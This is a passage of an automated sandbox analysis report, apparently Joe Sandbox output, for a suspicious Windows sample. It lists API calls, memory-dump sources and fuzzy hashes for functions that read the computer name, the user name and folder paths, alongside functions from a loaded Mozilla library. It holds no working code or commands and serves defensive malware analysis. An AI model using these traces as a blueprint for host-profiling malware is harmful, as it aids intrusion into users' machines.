Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7887d91a1177f40cdb335a4f7156c6ce6bfb9972a8e527ced2c6c0b46cb4e9f0
Instruction ID: 7e87a6b65fff3133a255a95f99bbf194b8526c3a86e35548299ef75390c442c2
Opcode Fuzzy Hash: 7887d91a1177f40cdb335a4f7156c6ce6bfb9972a8e527ced2c6c0b46cb4e9f0
Instruction Fuzzy Hash: A5F0E272641218BBE714AAA4AC49FAEB7DCA706B04F300448F600E3280D6719F008B60

Function 00198830 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e61f69b74798fd518d567aa7799b0445fe4beab348ef5f0ef3277391d0a91875
Instruction ID: dda5d54c3596c08b4427a66646e0b674e98df896b8f44ba2951ebddbfe060346
Opcode Fuzzy Hash: e61f69b74798fd518d567aa7799b0445fe4beab348ef5f0ef3277391d0a91875
Instruction Fuzzy Hash: F3F03971C0020CEFCF04EFA4C8596ACBB75EF11314F908299E829A7291DBB45B49CF91

Function 00198880 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: b2cf4df68af7d844435e902dd6cf75e6338634039a44752d5c5e3bdfcb955dc2
Instruction ID: 8f4f7d06ea5c1907f505131979ac9da88d5c9dc1735450568534169a6c5cc65b
Opcode Fuzzy Hash: b2cf4df68af7d844435e902dd6cf75e6338634039a44752d5c5e3bdfcb955dc2
Instruction Fuzzy Hash: 5CE01A71A4034C6BDB55EB90CC96FEE736CAB44B01F404295BA0C9B1C0DE70AB858B91

Function 00181190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF

Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F

ExitProcess.KERNEL32 ref: 001811C6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 658b5cb4503ae97063187b69e39aeb03953937165ee7876afbfe45cff6e21dc6
Instruction ID: 32ce0bf248b84f3b507574158927444e31573adecbd26623884c98aabe6a790b
Opcode Fuzzy Hash: 658b5cb4503ae97063187b69e39aeb03953937165ee7876afbfe45cff6e21dc6
Instruction Fuzzy Hash: 5EE017A692430266DE1077B4AC0AF2B728C5F3630AF001424FA08C3142EF25F9108765

Function 001988D0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 41328dac7fb73fedb6be9743df7e0d5fc7c6efdd650eeb1b0563f75a0a6f5899
Instruction ID: ec0caabe4b7f0e4d968e204698eb60af625ea473fd583ed446eb9d0971d87503
Opcode Fuzzy Hash: 41328dac7fb73fedb6be9743df7e0d5fc7c6efdd650eeb1b0563f75a0a6f5899
Instruction Fuzzy Hash: 7E01E47490420CEFCF05CF98D595BACBBB5AF46308F248088E9456B380C7746A84DB46

Non-executed Functions

Function 6C685440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C685492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6854A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6854BE
__Init_thread_footer.LIBCMT ref: 6C6854DB

Part of subcall function 6C6AAB3F: EnterCriticalSection.KERNEL32(6C6FE370,?,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB49
Part of subcall function 6C6AAB3F: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AAB7C

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

GetCurrentThreadId.KERNEL32 ref: 6C6854F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C685516
GetCurrentThreadId.KERNEL32 ref: 6C68556A
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685577
moz_xmalloc.MOZGLUE(00000070), ref: 6C685585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C685590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6855E6
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C685616

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

GetCurrentThreadId.KERNEL32 ref: 6C68563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C685646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C68567C
free.MOZGLUE(?), ref: 6C6856AE

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6856E8
GetCurrentThreadId.KERNEL32 ref: 6C685707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C68570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C685729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C68574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C68576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C685796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6857B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6857CA

Strings

[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C685AC9
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C685717
MOZ_PROFILER_STARTUP, xrefs: 6C6855E1
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C685724
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6857C5
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C685B38
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C68548D
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C685D1C
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C685766
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C68584E
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C685749
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6854B9
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C685C56
MOZ_BASE_PROFILER_HELP, xrefs: 6C685511
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C685D2B
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6857AE
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C685791
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C685D01
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C685CF9
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6856E3
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C685D24
GeckoMain, xrefs: 6C685554, 6C6855D5
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C685BBE
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6854A3
[I %d/%d] profiler_init, xrefs: 6C68564E

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
Instruction ID: 2c3640683dd86a3f0621a85368176c7ad85a3fdc5b01776cda0ff575a2627e02
Opcode Fuzzy Hash: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
Instruction Fuzzy Hash: 062223B09053009BFB009F65989465AB7F6AF8734CF04452AE96797B41E731C84ACB6F

Function 6C686C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C686CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C686D26

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C686D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C686D73
free.MOZGLUE(00000000), ref: 6C686D80
CertGetNameStringW.CRYPT32 ref: 6C686DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C686DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C686DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C686E10
CryptMsgClose.CRYPT32(00000000), ref: 6C686E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C686E34
CreateFileW.KERNEL32 ref: 6C686EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C686F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C68709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C687103
free.MOZGLUE(00000000), ref: 6C687153
CloseHandle.KERNEL32(?), ref: 6C687176
__Init_thread_footer.LIBCMT ref: 6C687209
__Init_thread_footer.LIBCMT ref: 6C68723A
__Init_thread_footer.LIBCMT ref: 6C68726B
__Init_thread_footer.LIBCMT ref: 6C68729C
__Init_thread_footer.LIBCMT ref: 6C6872DC
__Init_thread_footer.LIBCMT ref: 6C68730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6873C2
VerSetConditionMask.NTDLL ref: 6C6873F3
VerSetConditionMask.NTDLL ref: 6C6873FF
VerSetConditionMask.NTDLL ref: 6C687406
VerSetConditionMask.NTDLL ref: 6C68740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C68741A
moz_xmalloc.MOZGLUE(?), ref: 6C68755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C687568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C687585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C687598
free.MOZGLUE(00000000), ref: 6C6875AC

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

Strings

wintrust.dll, xrefs: 6C6872CD
SHA256, xrefs: 6C686EC0
(, xrefs: 6C68768A
CryptCATAdminReleaseCatalogContext, xrefs: 6C6872C8

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
Instruction ID: 2422c8dc4d9a572f5e4a74baa2ee5fd10160f6e858a89d2492ba0624c01e92dd
Opcode Fuzzy Hash: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
Instruction Fuzzy Hash: 1252E5B1A012189FEB21CF65CC84BAA77F9EF46704F004199F529A7640DB70AF85CF69

Function 6C6B0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6B0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C6B0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B0FB7
EnterCriticalSection.KERNEL32(?), ref: 6C6B0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C6B1031
LeaveCriticalSection.KERNEL32(?), ref: 6C6B10D0
EnterCriticalSection.KERNEL32(?), ref: 6C6B117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C6B1C39
EnterCriticalSection.KERNEL32(6C6FE744), ref: 6C6B3391
LeaveCriticalSection.KERNEL32(6C6FE744), ref: 6C6B33CD
LeaveCriticalSection.KERNEL32(?), ref: 6C6B3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3437

Strings

<jemalloc>, xrefs: 6C6B3941, 6C6B39F1
: (malloc) Unsupported character in malloc options: ', xrefs: 6C6B3A02
Compile-time page size does not divide the runtime one., xrefs: 6C6B3946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C6B3559, 6C6B382D, 6C6B3848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6B37A8
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6B37D2
